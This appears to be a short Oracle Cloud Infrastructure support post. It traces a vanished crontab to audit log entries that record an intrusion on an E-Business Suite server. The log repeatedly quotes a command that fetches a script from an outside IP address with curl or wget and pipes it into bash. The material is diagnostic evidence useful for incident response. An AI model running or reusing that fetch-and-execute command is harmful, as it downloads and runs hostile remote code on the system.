OCI: Manually created crontab missing
Applies To:
Oracle Cloud Infrastructure - Version N/A and later
Linux x86-64
Symptoms:
While running command “crontab -l” – no output is displayed, even though crontab was created.
$ crontab -l
Cause:
The audit logs have captured a “curl” from an unknown source: type=PROCTITLE msg=audit(01/01/2024 19:29:16.964:10576723) : proctitle=/bin/sh -c (curl -k -s http://164.177.71.215/mobile/oebs.php||wget -qO- http://164.177.71.215/mobile/oebs.php)|bash type=PATH msg=audit(01/01/2024 19:29:16.964:10576723) : item=1 name=/lib64/ld-linux-x86-64.so.2 inode=67520595 dev=08:03 mode=file,755 ouid=root ogid=root rdev=00:00 obj=system_u:object_r:ld_so_t:s0 nametype=NORMAL cap_fp=none cap_fi=none cap_fe=0 cap_fver=0 cap_frootid=0 type=PATH msg=audit(01/01/2024 19:29:16.964:10576723) : item=0 name=/bin/sh inode=1854242 dev=08:03 mode=file,755 ouid=root ogid=root rdev=00:00 obj=system_u:object_r:shell_exec_t:s0 nametype=NORMAL cap_fp=none cap_fi=none cap_fe=0 cap_fver=0 cap_frootid=0 type=CWD msg=audit(01/01/2024 19:29:16.964:10576723) : cwd=/u02/PROD/fs2/FMW_Home/user_projects/domains/EBS_domain type=EXECVE msg=audit(01/01/2024 19:29:16.964:10576723) : argc=3 a0=/bin/sh a1=-c a2=(curl -k -s http://164.177.71.215/mobile/oebs.php||wget -qO- http://164.177.71.215/mobile/oebs.php)|bash type=SYSCALL msg=audit(01/01/2024 19:29:16.964:10576723) : arch=x86_64 syscall=execve success=yes exit=0 a0=0x7f874d913900 a1=0x7f874da6f010 a2=0x7ffebffe4f38 a3=0x379 items=2 ppid=7592 pid=17427 auid=unknown(12345) uid=unknown(12345) gid=unknown(12234) euid=unknown(12345) suid=unknown(12345) fsuid=unknown(12345) egid=unknown(12234) sgid=unknown(12234) fsgid=unknown(12234) tty=(none) ses=2365 comm=sh exe=/usr/bin/bash subj=unconfined_u:unconfined_r:unconfined_t:s0-s0:c0.c1023 key=all_cmds
Tagged:
0